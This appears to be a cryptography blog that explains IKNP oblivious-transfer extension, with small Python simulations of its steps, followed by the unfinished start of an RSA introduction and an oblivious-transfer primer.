We’ll start with a quick reminder of what an Oblivious-Transfer is.
Oblivious-Transfer is a functionality which takes place between two parties.
The protocol realizing Oblivious-Transfer should satisfy three constraints:
Oblivious-Transfers (OTs) are useful for a wide range of applications (e.g., for Garbled-Circuits). I have also dedicated a post to showing how OTs can be constructed and why constructing them is not a trivial task. Moreover, all known constructions of OTs are based on primitives beyond symmetric-cryptography, such as RSA groups and elliptic-curve groups. Such primitives are typically computationally expensive; therefore, applications that require large quantities of OTs, even if these OTs are done in parallel, may suffer from poor performance. At this point you are probably eager to know what an OT extension is, so just before defining OT-extensions, I’d like to briefly introduce the notion of Hybrid Cryptosystems (to which I should probably dedicate a post someday).
:warning: Warning: If you don’t know about Public-Key Cryptography, you are encouraged to skip the following paragraph; it is given only as a supplementary analogue of OT-extension from the realm of Encryption-Schemes.
OTs remind me of public-key encryption (PKE) in the following sense: public-key encryption is a computationally heavy tool, just like known implementations of OTs. To achieve secure communication, a naive cryptographer might be tempted to use this tool to encrypt each and every message sent between two communicating parties. However, encrypting 100% of the communication using PKE may lead to poor performance and increased costs for companies with millions of clients connected concurrently. From an engineering perspective we would prefer using secret-key encryption to secure the communication. However, secret-key encryption, as its name suggests, requires the communicating parties to agree on a secret key, unlike public-key encryption. We would be interested, therefore, in a solution that is as efficient as secret-key encryption but preserves the convenience of public-key cryptosystems. The solution is to use the public-key encryption tool only to realize a secure Key-Agreement (KA) protocol, so that after this KA protocol ends, the communicating parties share a secret key that is used to encrypt the rest of the communication efficiently.
Similarly, protocols for OTs are computationally heavy. Consider the scenario where a naive cryptographer wants to implement some protocol (e.g., Yao’s Garbled Circuits protocol) that requires a large number of OTs (say 100,000 OTs) between two parties. That is, one party $P_A$ holds 100,000 pairs of messages $(m_0^1,m_1^1),\ldots,(m_0^{100,000},m_1^{100,000})$ while another party $P_B$ holds 100,000 choice bits $b_1,\ldots,b_{100,000}$. We want to end up with $P_B$ receiving $m_{b_i}^i$ for $i=1,\ldots,100,000$ without $P_A$ learning anything about $P_B$’s choice bits and without $P_B$ learning anything about the messages she didn’t choose. The naive cryptographer, therefore, might be tempted to run the OT protocol 100,000 times. Since the OT protocols we know of today are computationally heavy, doing so might result in poor performance. We are therefore interested in realizing these 100,000 OTs without actually running the OT protocol 100,000 times. Achieving this goal is done by employing OT-Extension. In other words, OT-Extension is a method to realize a large number of OTs from a small number of invocations of the OT protocol. It is important to clarify at this early point that our goal is to minimize computation rather than communication. That is, the main bottleneck for realizing large numbers of OTs is computational rather than communicational.
:bangbang: Spoiler: After we resolve the computational bottleneck, communication becomes the major bottleneck. While the problem of reducing the communication cost of OT-Extension has been extensively studied, we will not be focusing on these follow-up works today.
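Before diving into protocols, it may help to pin down the target as code. The sketch below is my own illustration (the function name and variables are not from any paper) of the *ideal functionality* we want to emulate: imagine a trusted third party that takes both inputs and hands the receiver exactly its chosen messages. Real protocols must achieve the same input/output behavior without any trusted party.

```python
def ideal_n_ot(sender_pairs, choice_bits):
    """Ideal N-OT functionality: a trusted party receives the sender's N
    message pairs and the receiver's N choice bits, and outputs to the
    receiver exactly the chosen message of each pair -- and nothing else
    to either party."""
    assert len(sender_pairs) == len(choice_bits)
    return [pair[b] for pair, b in zip(sender_pairs, choice_bits)]

# Toy run with N = 3.
pairs = [(b"m0_1", b"m1_1"), (b"m0_2", b"m1_2"), (b"m0_3", b"m1_3")]
bits = [1, 0, 1]
assert ideal_n_ot(pairs, bits) == [b"m1_1", b"m0_2", b"m1_3"]
```

The whole difficulty of OT, of course, is realizing this behavior with two mutually distrusting parties instead of the trusted third party.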
Let’s try to define the problem a little more concretely. First, we distinguish between OTs and secret-key primitives, also known as “Minicrypt” (e.g., Pseudorandom Generators (PRGs), One-Way Functions (OWFs) and Secret-Key Encryption). You may ask “but why?!”, and this is a rightful question. Why do we distinguish between OTs and secret-key primitives? Well, there are two reasons for doing so, a practical one and a theoretical one. The practical reason is that we simply don’t know how to build protocols for OT that rely solely on secret-key primitives! Indeed, if we ever find out how, this distinction will become meaningless. The theoretical reason was given by Impagliazzo and Rudich, who showed in their paper “Limits on the provable consequences of one-way permutations” from 1989 that a black-box reduction from OT to OWFs would imply $P\neq NP$. Without getting into too much detail, it means that constructing OTs from secret-key primitives in a black-box way would resolve the most fundamental question in theoretical computer science. While it isn’t impossible, it seems quite challenging with our existing knowledge in complexity theory, and therefore, for the time being, our distinction makes sense.
Moving forward with our problem definition, we would like to realize the following functionality, which we call $N$-OT, where, informally speaking, two parties $P_S$ (the “sender”) and $P_R$ (the “receiver”) wish to realize $N$ OTs. That is, $P_S$ holds $N$ pairs of messages ${(m_0^1,m_1^1),\ldots,(m_0^N,m_1^N)}$ and $P_R$ holds $N$ choice bits ${b_1,\ldots,b_N}$. Our protocol for $N$-OT has to satisfy the following criteria (which we mentioned at the beginning of the post for $N=1$):
As we already mentioned, one way to realize this protocol is simply via $N$ invocations of the OT protocol for a single message, but in order to reduce the computational complexity of our protocol, we add another criterion:
So just before seeing how exactly this problem can be solved, I’d like to discuss the historical chain of events that eventually led to the construction I’ll present later in the post.
As we mentioned earlier, in 1989 Impagliazzo and Rudich proved that building OTs from “black-box” symmetric-key primitives would resolve the most fundamental question in theoretical computer science. Following that work, Donald Beaver showed in 1991 that a small number of OTs can be extended into a large number of OTs, which is what we are looking for today. Right? Well, yes and no. The way Beaver’s construction works is what cryptographers call “non-black-box”; that is, Beaver’s construction indeed uses a secret-key primitive (namely, a PRG) to extend a small number of OTs into a large number of OTs, but it does so in a “non-black-box” way. The term “non-black-box” means that Beaver’s extension relies on the exact way the PRG is computed. To be exact, his construction doesn’t simply use the PRG as it is supposed to be used, but assumes the parties running the construction have access to the boolean circuit computing the PRG itself. Cryptographers usually try to refrain from non-black-box constructions for various somewhat technical reasons. In our case, since the parties running Beaver’s extension algorithm have to be aware of the boolean circuit computing the PRG, they cannot delegate the PRG computation to another party (what cryptographers call a “PRG oracle”); they must compute it themselves, since the extension algorithm meddles with the actual computation the PRG circuit is doing. Refraining from non-black-box constructions also has practical reasons, relating to the efficiency issues these constructions typically incur.
So, since Beaver has outsmarted our criterion, let’s change the previous criterion a little bit:
The difference from the previous phrasing of the criterion is in bold, that is, we seek to use symmetric key primitives in a black box way.
Next, in 2003 Ishai, Kilian, Nissim and Petrank (hereafter IKNP) published their paper “Extending Oblivious Transfers Efficiently”, where they presented an OT extension relying on secret-key primitives (specifically, a PRG) in a black-box way. Having presented the problem and some of the relevant history that led to its solution, in the rest of this post we shall focus on the IKNP construction itself. But to fully understand it there is a minor subtlety we have to discuss first regarding OTs.
To make the problem of OT extension a bit “cleaner” we will present two different types of OTs:
This may sound a bit counter-intuitive, but actually the first functionality (Chosen-Message OT) is easier to realize than Random OT. Why so? Let’s try to prove it! If we show that from Random-OT we can construct Chosen-Message OT, then indeed any protocol for Random-OT implies a protocol for Chosen-Message OT, and therefore the latter is an easier problem. Well, given a protocol that samples random messages for the OT, we can transform it into a chosen-message OT as follows (relying only on symmetric primitives).
:warning: You are encouraged to stop reading and think about it for a few minutes.
The solution goes (informally) like this: say the sender received random messages $r_0,r_1$ from the Random-OT functionality while the receiver received $b, r_{b}$ from it. To realize a chosen-message OT where the sender inputs $m_0,m_1$ and the receiver has a choice bit $b'$, we can do the following:
The receiver sends the sender $d = b\oplus b'$. This is a random bit, since the bit $b$ is random and the sender doesn’t know $b$; in particular, the sender doesn’t learn anything about either $b$ or $b'$ from this bit.
In other words, the idea is to use the random messages from the Random-OT functionality as symmetric keys and send $b\oplus b'$ to the sender so it can “change the ordering” of its messages if $b\neq b'$.
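The reduction above can be written out concretely. Here is a minimal sketch of one such derandomization (variable names are mine, and I use plain XOR as the one-time-pad encryption, which is fine as long as messages are no longer than the random OT messages):

```python
import secrets

LAM = 128  # bit-length of the random OT messages

# --- What the Random-OT functionality hands the parties ---
r0, r1 = secrets.randbits(LAM), secrets.randbits(LAM)  # sender's random messages
b = secrets.randbits(1)                                # receiver's random choice bit
rb = (r0, r1)[b]                                       # receiver also gets r_b

# --- The parties' actual (chosen) inputs ---
m0, m1 = 0xCAFE, 0xBEEF   # sender's chosen messages
b_prime = 1               # receiver's chosen bit

# Receiver -> Sender: d = b xor b'. Since b is random and hidden from the
# sender, d reveals nothing about b'.
d = b ^ b_prime
# Sender -> Receiver: encrypt m_j under the random message at position j xor d.
y0 = m0 ^ (r0 if d == 0 else r1)   # y_j = m_j xor r_{j xor d}
y1 = m1 ^ (r1 if d == 0 else r0)
# Receiver decrypts position b' with the one key it knows, r_b:
# y_{b'} = m_{b'} xor r_{b' xor d} = m_{b'} xor r_b.
recovered = (y0, y1)[b_prime] ^ rb
assert recovered == m1
```

The receiver learns only $m_{b'}$ (the other ciphertext stays padded by a random message it doesn’t know), and the sender learns nothing from the uniformly random bit $d$.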
In any case, since chosen-message OT can easily be built from Random-OT, the IKNP construction focuses on extending a small number of OTs into a large number of Random OTs.
In their paper, IKNP focus on taking a small number ($\lambda$) of OTs and extending them into a large number ($N$) of Random OTs. Let’s see how it’s done. We denote by $\lambda$ the security parameter, that is, a parameter such that the higher it is set, the more secure the protocol gets.
Since we can use secret-key primitives we will use a pseudorandom-generator ${\sf PRG}:\{0,1\}^\lambda \rightarrow \{0,1\}^N$ so that both the sender and the receiver will apply the PRG on all of their messages:
At this point we can think of $M_j^i$ as vectors in $\mathbb{F}_2^N$, that is, vectors of length $N$ where each element is either $0$ or $1$; we can also think of the $b_i$’s as elements in $\mathbb{F}_2$. We use “$+$” and “$-$” to denote addition/subtraction in $\mathbb{F}_2$ as well as point-wise addition of vectors in $\mathbb{F}_2^N$. The distinction between addition and subtraction is cosmetic, as in binary fields they have the exact same outcome. With this algebraic setting it holds that for any $i\in \{1,\ldots,\lambda\}$:
\[M^i_{b_i} = M_0^i\cdot(1-b_i)+M_1^i\cdot b_i\]Indeed, convince yourself the above equation is correct both when $b_i=0$ and when $b_i=1$. By moving some terms from the right hand side of the equation to the left, we get:
\[M^i_{b_i} - M_0^i = (M_1^i-M_0^i)\cdot b_i\]To simplify, for each $i\in \{1,\ldots,\lambda\}$
Therefore, we get:
\[\vec{w}_i - \vec{v}_i = \vec{u}_i \cdot b_i\]In fact, it will be easier in the rest of the post to use matrix notation rather than vector notation. Therefore, think of three matrices $W,V,U\in \mathbb{F}_2^{N \times \lambda}$ such that the $i$th column of $W,V,U$ is $\vec{w}_i,\vec{v}_i,\vec{u}_i$ respectively. In addition, the receiver denotes $\vec{b}=(b_1,\ldots,b_\lambda)$. Also, we introduce a little bit of notation:
With our new notation it holds that $W-V=U\times\text{diag}(\vec{b})$, where “$\times$” denotes matrix multiplication. Be sure you understand why the equality above really holds; it might help to write the matrices explicitly, so the above equality means that:
\[\begin{pmatrix} \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \vec{w}_1 & \vec{w}_2 & \dots & \vec{w}_\lambda \\ \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \end{pmatrix} - \begin{pmatrix} \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \vec{v}_1 & \vec{v}_2 & \dots & \vec{v}_\lambda \\ \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \end{pmatrix} = \begin{pmatrix} \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \vec{u}_1 & \vec{u}_2 & \dots & \vec{u}_\lambda \\ \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \end{pmatrix} \times \begin{pmatrix} b_1 & 0 & \dots & 0 \\ 0 & b_2 & \dots & 0 \\ \vdots & \vdots & \ddots & \vdots \\ 0 & 0 & \dots & b_\lambda \end{pmatrix}\]With $U,V$ known to the sender and $W,\vec{b}$ known to the receiver.
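This correlation is easy to check in code. The toy simulation below (my own sketch; a SHA-256-based expander stands in for a real PRG, and parameters are tiny for illustration) sets up the $\lambda$ base OTs, expands the seeds, and verifies $W - V = U \times \text{diag}(\vec{b})$ column by column over $\mathbb{F}_2$:

```python
import hashlib
import secrets

LAM, N = 8, 16  # tiny security parameter and extension size, for illustration

def prg(seed: bytes) -> list:
    """Toy PRG: expand a seed into N pseudorandom bits via SHA-256."""
    digest = hashlib.sha256(seed).digest()
    return [(digest[i // 8] >> (i % 8)) & 1 for i in range(N)]

# Base OTs: the sender holds LAM seed pairs; the receiver holds choice bits
# and, for each i, only the seed matching its bit b_i.
seeds = [(secrets.token_bytes(16), secrets.token_bytes(16)) for _ in range(LAM)]
b = [secrets.randbits(1) for _ in range(LAM)]

# Columns of V, U (computable by the sender) and W (computable by the
# receiver), each a vector in F_2^N.
V = [prg(seeds[i][0]) for i in range(LAM)]                                 # v_i = M_0^i
U = [[x ^ y for x, y in zip(prg(seeds[i][1]), V[i])] for i in range(LAM)]  # u_i = M_1^i - M_0^i
W = [prg(seeds[i][b[i]]) for i in range(LAM)]                              # w_i = M_{b_i}^i

# Check W - V = U * diag(b): column i of W minus column i of V is u_i * b_i.
for i in range(LAM):
    assert [w ^ v for w, v in zip(W[i], V[i])] == [u & b[i] for u in U[i]]
```

Note how the receiver never touches the unchosen seeds, yet the algebraic relation holds for every column.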
Notice that by now the matrix $U$ is pseudorandom. Our goal at this point will be to derandomize the vectors $\vec{u}_i$ so that the columns of the matrix $U$ all become equal to the same vector $\vec{u}^*$ known to the sender. In other words, we want the sender to send some “correction” information to the receiver, who in turn will update its vectors $\vec{w}_i$ into corrected vectors $\vec{w}_i'$ so that for all $i\in\{1,\ldots,\lambda\}$ we will have $\vec{w}_i'-\vec{v}_i=\vec{u}^*\cdot b_i$. It is crucial that the receiver not be able to learn anything about the sender’s $\vec{v}_i,\vec{u}_i$ or $\vec{u}^*$ from the correction information it receives.
Without further ado, let’s see how the derandomization process goes. For each $i\in\{1,\ldots,\lambda\}$ the derandomization of $\vec{u}_i$ is done by:
Notice that now the equality holds:
\[\begin{aligned} \vec{w}_i' - \vec{v}_i &= \vec{w}_i - \vec{v}_i + \bar{u}_i\cdot b_i \\ &= \vec{u}_i\cdot b_i + \bar{u}_i \cdot b_i \\ &= \vec{u}_i\cdot b_i + \vec{u}^*\cdot b_i - \vec{u}_i\cdot b_i \\ &= \vec{u}^* \cdot b_i \end{aligned}\]As requested.
For each $i$ the sender sends $\bar{u}_i$, a vector of length $N$, so overall the communication in this step is $\lambda N$ bits.
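The derandomization step is short enough to simulate end to end. In this self-contained sketch (names are mine) I start directly from the correlation of the previous step, let the sender pick $\vec{u}^*$ and send $\bar{u}_i = \vec{u}^* - \vec{u}_i$, and let the receiver correct $\vec{w}_i' = \vec{w}_i + \bar{u}_i\cdot b_i$:

```python
import secrets

LAM, N = 8, 16  # tiny parameters, for illustration

def rand_vec():
    return [secrets.randbits(1) for _ in range(N)]

# Start from the correlation of the previous step: w_i - v_i = u_i * b_i,
# with random (stand-in for pseudorandom) columns.
b = [secrets.randbits(1) for _ in range(LAM)]
U = [rand_vec() for _ in range(LAM)]
V = [rand_vec() for _ in range(LAM)]
W = [[v ^ (u & b[i]) for v, u in zip(V[i], U[i])] for i in range(LAM)]

# Derandomization: the sender fixes one target vector u* and sends the
# corrections ū_i = u* - u_i (lambda vectors of N bits each).
u_star = rand_vec()
corrections = [[us ^ u for us, u in zip(u_star, U[i])] for i in range(LAM)]

# The receiver corrects its columns: w'_i = w_i + ū_i * b_i.
W_prime = [[w ^ (c & b[i]) for w, c in zip(W[i], corrections[i])] for i in range(LAM)]

# Every column now satisfies w'_i - v_i = u* * b_i.
for i in range(LAM):
    assert [w ^ v for w, v in zip(W_prime[i], V[i])] == [us & b[i] for us in u_star]
```

Since each $\vec{u}_i$ is (pseudo)random from the receiver’s point of view, the correction $\bar{u}_i$ acts as a one-time pad on $\vec{u}^*$ and reveals nothing about it.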
After this step the receiver updates its matrix $W$ into a matrix $W'$ whose $i$th column is $\vec{w}_i'$. Also, the sender updates its matrix $U$ so that now all of its columns equal $\vec{u}^*$. In fact, let the sender forget about the matrix $U$ and just store the vector $\vec{u}^*$. So now it holds that $W' - V = \vec{u}^* \times \vec{b}^T$ where $\vec{b}^T$ is just $\vec{b}$ written as a row vector. The following can help to visualize the foregoing matrix equality:
\[\begin{pmatrix} \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \vec{w}_1' & \vec{w}_2' & \dots & \vec{w}_\lambda' \\ \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \end{pmatrix} - \begin{pmatrix} \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \vec{v}_1 & \vec{v}_2 & \dots & \vec{v}_\lambda \\ \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \end{pmatrix} = \begin{pmatrix} \vec{u}^*_1 \\ \vec{u}^*_2 \\ \vdots \\ \vec{u}^*_N \\ \end{pmatrix} \times \begin{pmatrix} b_1 & b_2 & \dots & b_\lambda \end{pmatrix}\]Also notice that $\vec{u}^* \times \vec{b}^T$ is an outer product (sometimes called a “tensor product”), which simply means that the result is a matrix $M$ such that $M_{i,j}=\vec{u}^*_i \cdot b_j$.
This is the trickiest part, or at least it was the hardest for me to get when I first read about IKNP; though it isn’t very technical, there is something beautiful about it once you get it.
The last equation states that $W' - V = \vec{u}^* \times \vec{b}^T$. Therefore, for each row $j$ of the matrices $W',V$ it holds that:
\[W'_{j,\cdot} - V_{j,\cdot} = \vec{u}^*_j \cdot \vec{b}^T\]In other words, the row vector resulting from subtracting the $j$th row of $V$ from the $j$th row of $W'$ equals the $j$th element of the vector $\vec{u}^*$ (that is, $\vec{u}^*_j$) multiplied by the row vector $\vec{b}^T$.
Notice that $W’_{j,\cdot}$, $V_{j,\cdot}$ as well as $\vec{b}$ are vectors in $\mathbb{F}_2^\lambda$ and $\vec{u}^*_j$ is just a single bit. In this stage for each $j\in \{1,\ldots,N\}$:
Now if you look closely, the sender, who holds $V_{j,\cdot}$ actually holds $\vec{r}_{c_j}^j$. This looks very much like the original OT correlation, right?
But we got the roles flipped! Our receiver party is now the one that holds two messages, while the sender party holds a choice bit and the message corresponding to its choice. So we managed to get an OT correlation in which the receiver of the original OTs acts as a sender and the sender of the original OTs becomes a receiver.
This feature of IKNP is important to mention: the OT extension works by extending a small number of OTs into a large number of OTs while flipping the roles of the sender and the receiver.
One last property of the resulting OTs, which will take us to the last and final step of IKNP, is that we were seeking Random OTs. However, in the resulting OT correlation (of the $\vec{r}_0^j,\vec{r}_1^j$ and choice bit $c_j$) it holds that the OT messages $\vec{r}_0^j,\vec{r}_1^j$ are not so random. Notice that for all $j\in\{1,\ldots,N\}$ the subtraction of the messages satisfies:
\[\vec{r}_1^j - \vec{r}_0^j=\vec{b}\]Notice that a truly random OT would not have this property, since for random messages the difference is also random. In more professional jargon, the messages $\vec{r}_0^j$ and $\vec{r}_1^j$ are correlated, with $\vec{b}$ being the correlation. Therefore the last step in the IKNP construction is breaking the correlation.
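The row-wise reading, the role flip, and the leftover correlation can all be checked in a few lines. In this self-contained sketch (my own naming) I build $W'$ directly from the identity $W' - V = \vec{u}^* \times \vec{b}^T$ derived earlier, then read the rows as $N$ flipped OT instances:

```python
import secrets

LAM, N = 8, 16  # tiny parameters, for illustration

b = [secrets.randbits(1) for _ in range(LAM)]       # receiver's base-OT choice bits
u_star = [secrets.randbits(1) for _ in range(N)]    # sender's derandomization target

# V is N x LAM, stored row by row here; W' = V + u* x b^T (outer product over F_2).
V = [[secrets.randbits(1) for _ in range(LAM)] for _ in range(N)]
W_prime = [[V[j][i] ^ (u_star[j] & b[i]) for i in range(LAM)] for j in range(N)]

# Read the rows as N OT instances with the roles flipped.
for j in range(N):
    r0 = W_prime[j]                       # held by the original receiver
    r1 = [x ^ y for x, y in zip(r0, b)]   # r_1^j = r_0^j + b, also held by it
    c = u_star[j]                         # choice bit, held by the original sender
    assert V[j] == (r0, r1)[c]            # the original sender holds r_{c_j}^j
    # The leftover correlation: every pair differs by the SAME vector b.
    assert [x ^ y for x, y in zip(r1, r0)] == b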
This step is quite technical, at the beginning of it:
To break the correlation, IKNP suggest one of the following options:
If we assume the “Random Oracle Model” where both parties have access to a random function $\mathcal{O}:[N]\times\{0,1\}^\lambda \to \{0,1\}^\lambda$ then:
The resulting correlation, where $P_R$ holds $(h_0^1,h_1^1),\ldots,(h_0^N,h_1^N)$ and $P_S$ holds $(c_1,h_{c_1}^1),\ldots,(c_N,h_{c_N}^N)$, is a truly random set of $N$ OT correlations; that is because a random oracle, being a truly random function, is very unlikely to preserve the correlations.
If we prefer not to assume the “Random Oracle Model”, then IKNP also propose the usage of “Correlation Robust Hash Functions”, a cryptographic construct which can be thought of as just a regular hash function with the restriction (satisfied by almost all real-life constructions of hash functions) that for a random “offset” $R$, the function $x \mapsto H(x+R)$ is pseudorandom. In their paper they show that Correlation Robust Hash Functions are sufficient to break the correlation.
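As a toy illustration of the correlation-breaking step (SHA-256 stands in for the random oracle / correlation-robust hash; this is my sketch, not the paper’s notation), each correlated pair is hashed together with its instance index, and the party holding only its chosen message can still compute its chosen hash:

```python
import hashlib
import secrets

LAM, N = 8, 4  # tiny parameters, for illustration

def H(j: int, x: list) -> bytes:
    """Stand-in for the random oracle / correlation-robust hash: hash the
    instance index j together with the lambda-bit input x."""
    return hashlib.sha256(j.to_bytes(4, "big") + bytes(x)).digest()

b = [secrets.randbits(1) for _ in range(LAM)]
for j in range(N):
    r0 = [secrets.randbits(1) for _ in range(LAM)]
    r1 = [x ^ y for x, y in zip(r0, b)]   # correlated pair: r_1 - r_0 = b
    c = secrets.randbits(1)
    # Hashing both sides breaks the correlation: h0 and h1 no longer share
    # a common offset, and (to a bounded adversary) look independent.
    h0, h1 = H(j, r0), H(j, r1)
    # The party holding only (c, r_c) still derives its chosen message:
    assert H(j, (r0, r1)[c]) == (h0, h1)[c]
```

Including the index $j$ in the hash matters: without it, two instances that happened to share an input would yield identical outputs, reintroducing a correlation.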
If we combine all previous steps we get the following protocol.
The above protocol is secure against semi-honest adversaries. Without getting too deeply into the definitions, it means that “if everyone follows the protocol, no inadvertent leakage of information will occur”. But what happens if one of the parties decides to deviate from the protocol? IKNP did address this issue in their paper, but before jumping into it let’s think – what can go wrong? The parties can only cheat wherever they communicate, and the only communication in our protocol (assuming the Base-OTs are secure) is in the derandomization phase. The party $P_S$ has to use the same $\vec{u}^*$ when computing all the correction vectors $\bar{u}_i$; it may decide not to do so, which might help $P_S$ guess $P_R$’s resulting messages, or learn some information about them. To achieve security against malicious adversaries we have to ensure that $P_S$ is consistent in the way it computes the correction vectors. I’ll try to explain very briefly what IKNP did to achieve security against malicious adversaries. IKNP solve this problem with the classical approach of “cut-and-choose”: instead of running the algorithm once, they run it $2^\sigma$ times for some security parameter $\sigma$, and then the $P_R$ party asks $P_S$ to “open” its secret $U,V$ matrices in exactly $2^{\sigma-1}$ of the executions. If $P_S$ cheated in a significant portion of the executions, it will be caught with good probability, and therefore it is safe to assume that the unopened executions are safe.
Notice that this “cut-and-choose” approach is simple but very expensive in terms of computation and communication.
The IKNP protocol has been a foundational building block for further research on efficient OT extensions. The computational cost of IKNP per OT is negligible compared to the heavy machinery involved in running the Base-OT protocols. However, as we have seen towards the end of the post, the main drawbacks of the IKNP construction are:
Thank you for reading this post! I did take a lot of time writing it, so if it helped you somehow, I’ll be happy to know.
I’ll also be happy to hear your thoughts, questions and corrections, so feel free to reach out in any of the ways listed at the bottom of the page :smiley:
RSA is named after its three inventors: Ronald Rivest, Adi Shamir and Leonard Adleman who published in 1978 their paper titled: “A Method for Obtaining Digital Signatures and Public-Key Cryptosystems” (paper link).
I think it’s really amazing to read this paper in particular, and old papers in general, as it gives you some perspective about what life looked like decades ago! Just as an example, the paper begins with the following:
The era of “electronic mail” [10] may soon be upon us; we must ensure that two important properties of the current “paper mail” system are preserved: (a) messages are private, and (b) messages can be signed. We demonstrate in this paper how to build these capabilities into an electronic mail system.
It is sometimes hard to believe that all this progress was made back in the 1970s without the internet; or perhaps these inventions are what made the internet possible. Just imagine, they had no emails!
Anyway, back to our original topic.
Before jumping into RSA, let’s see what was so innovative about it. Say we have Alice and Bob who wish to communicate secretly; how can they do this? Up until the invention of Asymmetric Cryptography, Alice and Bob had to agree on some secret key which would later be used to encrypt and decrypt the information they exchange. Since only the two communicating parties knew the key, the channel was assumed to be secret. In the old days (and by old I mean up until the 1970s) this key had to be exchanged over a secure channel. These “secure channels” were typically just armed convoys carrying printed key material. But today none of this happens; when you connect to the internet you don’t have to send a secure envelope to the server with guards sailing across the ocean :thinking:.
The cornerstone of the technology that lets us connect to websites without any convoys is the seminal work of Whitfield Diffie and Martin Hellman who published in 1976 their legendary paper titled “New Directions in Cryptography” (paper link), which led to a Key-Exchange protocol popularized under the name “Diffie-Hellman Key-Exchange”.
:warning: Notice: While we won’t get into the Diffie-Hellman protocol here, we do have to understand that it allows two parties to publicly exchange information from which a secret key, known only to these two parties, can be derived.
The Diffie-Hellman protocol ends with two parties having a Symmetric Key. By “Symmetric” we mean that both parties hold the same key and this key is used for both encryption and decryption.
The major innovation in the RSA cryptosystem is that keys don’t have to be symmetric anymore! Instead, each party $P_i$ generates a secret key $sk_i$ and a public key $pk_i$. The secret key is kept secret and the public key is published publicly. Whenever someone wants to send $P_i$ a message $m$, they encrypt $m$ with the public key $pk_i$. The RSA cryptosystem is built such that ciphertexts created this way can be efficiently decrypted using the secret key $sk_i$, but since only $P_i$ holds this secret key, it will be the only party able to read these messages!
So, if two parties $P_1,P_2$ wish to communicate, $P_1$ will send $P_2$ messages using $P_2$’s public key $pk_2$ and $P_2$ will send messages to $P_1$ using $P_1$’s public key $pk_1$. Each party will decrypt its incoming messages using its secret key $sk_1$ or $sk_2$.
Let’s see how RSA makes this magic happen.
:warning: Notice: I’ll be assuming that you know a little bit about group theory here but nothing too deep.
Given two distinct primes $p,q$ we call $N=pq$ an RSA-modulus. We denote by $\mathbb{Z}^\ast_N$ the set of numbers between $1$ and $N-1$ that are coprime to $N$. Notice that any number sharing a common factor with $N$ has to be a multiple of at least one of its prime factors, which are $p$ and $q$, so $\mathbb{Z}^\ast_N$ is the set of all numbers between $1$ and $N-1$ that are neither a multiple of $p$ nor of $q$.
An RSA group is a group whose elements are $\mathbb{Z}^\ast_N$ for some RSA-modulus $N$ and whose group operation is multiplication modulo $N$.
Let’s have an example. Let $p=3$ and $q=5$ we have $N=p\cdot q = 15$ so $\mathbb{Z}^\ast_N=\lbrace 1,2,4,7,8,11,13,14\rbrace$. Our RSA group operation will take two numbers from $\mathbb{Z}^\ast_N$ and multiply them modulo $15$, for example $4*7=28 \equiv 13 \mod 15$. So if we apply the group operation on $4$ and $7$ we get $13$.
One characteristic of groups is that each element should have an inverse. We say that $a,b$ are inverses of each other if $a\ast b=1$ according to the group operation. For example $2\ast8=16 \equiv 1 \mod 15$, so $2$ and $8$ are the inverse of each other!
One question you can ask is: “Given a number $a$ in $\mathbb{Z}^\ast_N$, how fast can we find its inverse?”. Perhaps surprisingly, finding the inverse of $a$ in the RSA group can be done very efficiently (via the extended Euclidean algorithm) even without knowing $p,q$, the factors of $N$; with $p,q$ in hand, a popular theorem called the Chinese Remainder Theorem makes such computations even more convenient. The operations that are believed to be hard given only $N$ are of a different kind, such as extracting roots modulo $N$ (e.g., finding $x$ given $x^e \bmod N$). We don’t really know how hard this is, but we assume that for sufficiently large $p,q$ it takes a very long time.
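We can play with the $N=15$ example directly in Python (this sketch is mine; note that three-argument `pow` with exponent `-1` computes modular inverses, available since Python 3.8):

```python
# The RSA group Z*_15 from the example above.
p, q = 3, 5
N = p * q

assert (4 * 7) % N == 13    # the group-operation example from the text
assert (2 * 8) % N == 1     # 2 and 8 are inverses of each other

# Computing an inverse needs only N, not p and q: Python's pow runs the
# extended Euclidean algorithm under the hood (Python 3.8+).
group = [a for a in range(1, N) if a % p != 0 and a % q != 0]
assert group == [1, 2, 4, 7, 8, 11, 13, 14]
for a in group:
    inv = pow(a, -1, N)
    assert inv in group and (a * inv) % N == 1
```

By contrast, no built-in (or known efficient algorithm) recovers $x$ from $x^e \bmod N$ for a large $N$ of unknown factorization; that asymmetry is what RSA-style cryptography leans on.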
:memo: Notice: If anyone invalidates this assumption it means that the RSA cryptosystem will be immediately broken.
:memo: Notice 2: The security of RSA isn’t simply reduced to the validity of this assumption, in fact, it has been shown.
To be continued…
In this post we’re going to get to know one of the most fundamental constructions in cryptography, known as Oblivious Transfer, or OT for short. It has been used in a wide spectrum of topics in cryptography, and as such I must admit that I’m very excited to finally get to write about it!
Let’s start with a real-life scenario^{1}! Say we have Alice and Bob, where Alice has two messages $m_0,m_1$ and Bob has a bit $b \in \lbrace 0,1 \rbrace$ such that Bob wants to retrieve the message $m_b$. How can Bob and Alice do this? Well, if Bob doesn’t care much about his privacy, he could send Alice the bit $b$ and Alice would send him $m_b$ in return. But what if Bob does care about his privacy? Of course Alice can send Bob both $m_0,m_1$ and Bob will simply pick $m_b$, but this violates the privacy of Alice! So, if both parties care about their privacy, we want Bob to learn $m_b$ without Alice learning $b$ and without Bob learning $m_{1-b}$. While this may sound impossible and paradoxical at this point, it is actually possible, and if you finish reading this post you’ll probably be surprised by how simple it is. If Alice transfers $m_b$ to Bob while preserving all these privacy constraints, we say Alice Obliviously Transfers $m_b$ to Bob.
Without getting into the technical details, we can already say that Oblivious-Transfer is a general name for protocols with which one party can obliviously transfer data to another party. By “general name” I mean that just like sorting is a general name for various algorithms that sort data, OT is a name for protocols that obliviously transfer data. This also means that OT protocols take place between two parties: a sender, who offers messages to be sent, and a receiver, who selects one of the offered messages to receive.
Let’s start with a short history of the problem.
The first appearance of Oblivious-Transfer was in a paper by Michael (Oser) Rabin from 1981 and it didn’t even match the definition we have given here. In the original version the sender had a single message $m$ and at the end of the protocol the receiver may either learn $m$ with probability $1/2$ or learn nothing with probability $1/2$ without the sender knowing if $m$ was indeed learned or not.
